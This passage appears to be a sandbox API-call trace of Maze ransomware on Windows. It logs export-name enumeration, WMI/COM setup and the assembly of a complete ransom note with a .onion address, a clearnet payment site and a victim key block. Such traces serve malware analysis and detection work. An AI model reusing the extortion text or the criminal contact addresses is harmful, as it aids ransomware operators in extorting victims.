lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.554] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.554] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.554] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.554] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.554] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.554] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.554] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.554] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.554] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.554] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.554] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.554] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.554] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.554] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.554] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.554] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.554] lstrcpyA (in: lpString1=0x239db34, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.555] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.555] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.555] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.555] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.555] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.555] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.555] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.555] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.555] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.555] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.555] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.555] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.555] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.555] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.555] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.555] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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", lpString2="\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n1ujMBzMtWcg3j3csHFRTbG1OlFICZ2fF0SGosgxjcchu1MDIMly7CBAb4B+bIIeacNA7gqH05ksgSzA1rko+JhzG1aEZOxLV3NYO5/EiAH4Kdwgx07IijKtjA5jxSXRm8yHP9wQ2l9ZNWGniP+Ni5QI0KZKq+Nu+Lm0xfW6xZlgQuJ7gAcARahMWVmOt0CQfcxWXZPx/vAHewaxheaoOi+B6+PBHxvXhL37U/Qpa+KS3uA4mtoYGeQ0pBJhdLI94GnMqjwxH8okQgxbR/diYd4HmSXPVJnAH45cWUxlwWHi17tPcZsNoupdks4kuppSnc4mjJ6fxGCs8Yh9IF4iPQzkJ9479qQUbSlPvw0Q4Wy2ufAlaEdKQKylpinkoykAH9haZuRzjQeLAZ6z2bE/kg2jDl2HXUp7vC3sp2c6dGQR7W7rNOyxIqOYr+K1y7k8OeCfjzkOrSwkdhjPPMdyRpM//AZ/Klo7xajKVRqEDd+HWQvQfdxutG90dsyaFsz4cOThvcqAKiko93ph1UlLusFoSDSoATUqhYbucHlsFyl3KiMgnENT232fraqUcgUPv6WMMwK3L/oU1bQR8gzPDrP9mfq4rpOdVr5Mm5OlL0BqKE9uG4eB8LL8PRqSXCn6xSnvXRelGPBV2M4iWCQ6fNdHlDBb8eYoGdWrmTf5ceGztp8iWOwAvIdTE0VDE/iZPwhbwFA9H58EEZcER9eZDOyPo57GhGD0QKkZrjkakRe+M+zXqRnLMe/FjU3mmx8v1BW1d2ETKGfw+KmeVPDVs36/oWXMh8GDvndaaM7+0zxA4kaLihe2VHwwZraBNH2A7P1jvFMqTaLzSRDyh4BDtHyp0RSyOARjaK9bnyzFqXldxL91VUtNBItsKZvO44rK/c2ENr+RO0a0djv1NsTIzqk0QVttVeMYWV/Kphx5aGKfv6c3RexlncEyJ+q5fabIcuE+yrqYk+AMMC1HHZAZQnJt8JEc7ObLZCFX7GMH8uUqRt4VY6rCTsVCC5Si4/UBR6LLjKBLHXuGVwLpUOrsJjj/3zZJHM08ezZC/uCMZKx6/8LQFz47DFYs3/kG0RvYzxMZcXTMVCZ91MhUfEYtxIaTWQ4/C4f9cgIhnBLbKZcXjBk76LWjAWhA/yRD2EyKi2iFcryMv+U3sVCaXhPjMNjB32Vga3NBtJ4lFrkr2j8D7lwXTJq7F6pqPAP3oRTNmH/em4xUX4Ifx9Y1Ee54/BfonTTd3V6SDG9swfJRm8IvoSOhIqwJbERSM1lb91BrQyNHUPc+ATkYuB3CHxa9h+rJZGaE/MaytdSkjSPZF8xCWBvqIhaLgu2TCMYdJrVtRZyEs+G8R7JzU1zppCj3TMjRisS0C5vcuT6p6npiTEVQZ0RjSFmp57a4onMw4hy7kO98H/yaJfa/9jvnuMg/yOrS/sE0fk7MQUn7QbOy4YVdfEURHMBuzF6RcyH08o7q71oflLpJmqDw5357A6mtWv052N8rpV9PnCXuf4D7I3aWEwb5kDkOg37+MQzcuamSeRMDDU4xKUfszFm99Se+7DU7KHgz/xS9OnreaGVvoyeD6Wo/+2ySbTiofDJ00u9w4pQ8carEc87DMDr6HSi7D0tB4qKfmlOwoeD+wQVdxnH6m+Oe0fpWhk7xBvssGNw4coIY4J4rQx3e0Mda84GHHB8YQN4s5fsDhYijiQatKqvs+eaMdYiMFKqJV9DRoBkStGooClvOh2LwVMPe4aJufA2ECH4zkMHJRZUTqB/bHAacGN2baG8ivcwJsnYj2dsc93tzJDCkmxyIMqbtyqmTRJIvEv4K51A3dZDD2dvx/oHCjbIUfL9N9vr8vnejMVI2XJVafVhAs1C3/CUyOsrhrSH2/BaeNuSjCgEBQH3JVNd5wuQ6V+fFQjCmE23nFn/RXrWhl5gd5fiSFrvPREpiH+BeCGnpiTiTGjIHL7VAYhu7DQ6KVo54swkswxLclqpopQGLaeTCuh5D+OXiUsXA2Ygd3olJfrivH8eyrZPA/oLFa19eWWh1PQktd8D5NsrjvgYjNJqtOPsnyK2KvLeWbqUY9RYE3LD1IbT2UgH55Ehut6m83FzItZdf4gMoU8hRL4IpCCUHjWMANC6p8OMaCgYpUxKBqlhqCtV/ju2IlDJPGh2rx/+55q29Uk6N8I1nW6fSR8XpnoNMtsMWGmbfGiLJM5zs1TWLWKpZFsrdobiUUPRM5WnYBO0OphCz4Yc6H0wjragoiOQBjAGQAYQAwADkAZgAyADkAYwAzADUANABiADQAMgAAABCAQBoqNQBwADUATgByAEcASgBuADAAagBTACAASABBAEwAUABtAGMAeAB6AAAAIhRYAEQAVQBXAFQARgBPAE4ATwAAACoMbgBvAG4AZQB8AAAAMi5XAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsAAAAQih8AEMAXwBGAF8ANQAwADUANgAzADAALwA1ADIAMwA5ADcAOQB8AAAASABQQFiJCGCJCGiJCHD6gM0IeAyAAQGKAQMyLjA=\r\n---END MAZE KEY---\r\n\r\n" [0178.556] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.556] lstrcpyW (in: lpString1=0x5e0000, lpString2="1234567890qwertyuiopasdfghjklzxcvbnm" | out: lpString1="1234567890qwertyuiopasdfghjklzxcvbnm") returned="1234567890qwertyuiopasdfghjklzxcvbnm" [0178.556] lstrcpyW (in: lpString1=0x3e0000, lpString2="0a16c9" | out: lpString1="0a16c9") returned="0a16c9" [0178.557] lstrcatW (in: lpString1="0a16c9", lpString2=".tmp" | out: lpString1="0a16c9.tmp") returned="0a16c9.tmp" [0178.557] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.557] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.557] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.564] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0178.564] CoCreateInstance (in: rclsid=0xf6d64*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xf6d54*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x239f8a8 | out: ppv=0x239f8a8*=0x255cff8) returned 0x0 [0178.565] WbemContext:IWbemContext:SetValue (This=0x255cff8, wszName="__ProviderArchitecture", lFlags=0, pValue=0x239f8b8*(varType=0x3, wReserved1=0x45, wReserved2=0xf298, wReserved3=0x46, varVal1=0x40, varVal2=0x77652c54)) returned 0x0 [0178.565] lstrlenA (lpString="ole32.dll") returned 9 [0178.565] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0178.565] lstrcpyA (in: lpString1=0x239ec04, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0178.565] lstrlenA (lpString="BINDMONIKER") returned 11 [0178.565] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0178.565] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0178.565] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0178.565] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0178.565] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0178.565] 